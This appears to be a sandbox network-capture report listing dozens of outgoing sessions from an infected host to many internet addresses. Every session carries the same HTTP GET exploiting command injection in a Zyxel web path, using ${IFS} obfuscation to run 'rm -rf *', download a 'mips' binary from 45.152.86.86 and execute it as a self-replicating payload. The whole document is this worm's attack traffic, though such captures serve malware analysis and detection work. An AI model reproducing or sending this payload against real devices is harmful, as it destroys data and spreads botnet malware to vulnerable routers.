                              Mar 31, 2024 08:41:29.893805981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5023192.168.2.134146652.76.92.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893847942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5024192.168.2.1346696112.126.2.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893868923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5025192.168.2.1336930198.4.30.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893922091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5026192.168.2.134912894.180.158.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893953085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5027192.168.2.1357420112.14.32.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.893996954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5028192.168.2.1337358101.94.123.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894032955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5029192.168.2.134718068.183.200.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894081116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5030192.168.2.1357156170.184.121.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894146919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5031192.168.2.1339496213.139.198.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894166946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5032192.168.2.135606459.244.118.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894212961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5033192.168.2.1347150150.22.80.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894242048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5034192.168.2.1346790160.137.193.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894273043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5035192.168.2.134802420.103.170.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894332886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5036192.168.2.1353150136.220.0.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894360065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5037192.168.2.1358940146.80.1.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894398928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5038192.168.2.1355502207.10.178.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894431114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5039192.168.2.133482496.176.85.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894474030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5040192.168.2.1341422176.4.164.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894515038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5041192.168.2.13510541.195.135.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894567013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5042192.168.2.133299427.168.57.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894609928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5043192.168.2.133549890.103.97.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894642115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5044192.168.2.1350044105.33.218.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894695997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5045192.168.2.135261419.232.228.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894741058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5046192.168.2.1339108138.125.111.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894766092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5047192.168.2.1353942202.223.123.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894802094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5048192.168.2.133499057.193.3.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894824982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5049192.168.2.1351518210.23.68.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894860983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5050192.168.2.135569484.206.211.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894912004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5051192.168.2.1346244208.137.14.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894937038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5052192.168.2.134639475.242.75.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.894989014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5053192.168.2.1344860145.253.70.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895024061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5054192.168.2.1341320172.217.195.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895062923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5055192.168.2.1341512197.242.15.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895107031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5056192.168.2.1356086184.59.148.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895123005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5057192.168.2.1349422160.3.50.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895184994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5058192.168.2.133674418.149.234.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895219088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5059192.168.2.135718075.1.76.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895256996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5060192.168.2.1354362140.65.221.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895301104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5061192.168.2.1357808137.107.155.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895345926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5062192.168.2.1350576125.158.141.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895382881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5063192.168.2.1351992199.201.19.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895411968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5064192.168.2.1338240175.235.17.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895477057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5065192.168.2.1347502184.83.120.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895509005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5066192.168.2.1357368111.227.37.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895549059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5067192.168.2.1348358109.187.43.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895596027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5068192.168.2.1345560137.132.108.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895639896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5069192.168.2.134622437.136.228.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895664930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5070192.168.2.1348644139.178.227.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895714998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5071192.168.2.133718090.78.11.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895766020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5072192.168.2.1358452139.52.144.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895797968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5073192.168.2.1342384186.223.47.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895817995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5074192.168.2.1354020185.111.39.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895873070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5075192.168.2.1349454222.249.169.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895911932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5076192.168.2.135304620.34.173.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895940065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5077192.168.2.134106687.225.114.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.895992994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5078192.168.2.1346374187.44.186.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896040916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5079192.168.2.133660227.189.230.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896090984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5080192.168.2.134668040.164.29.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896122932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5081192.168.2.1353068170.46.172.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896168947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5082192.168.2.1356354103.206.175.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896235943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5083192.168.2.1358068154.50.79.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896265984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5084192.168.2.134281079.30.72.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896306992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5085192.168.2.133808675.117.177.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896342993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5086192.168.2.1356038130.182.15.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896385908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5087192.168.2.1335754211.202.85.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896434069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5088192.168.2.1344144149.158.184.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896488905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5089192.168.2.1341232118.33.102.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896517992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5090192.168.2.13561662.224.230.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:29.896553040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5091192.168.2.1355016173.50.205.107443
                              TimestampBytes transferredDirectionData
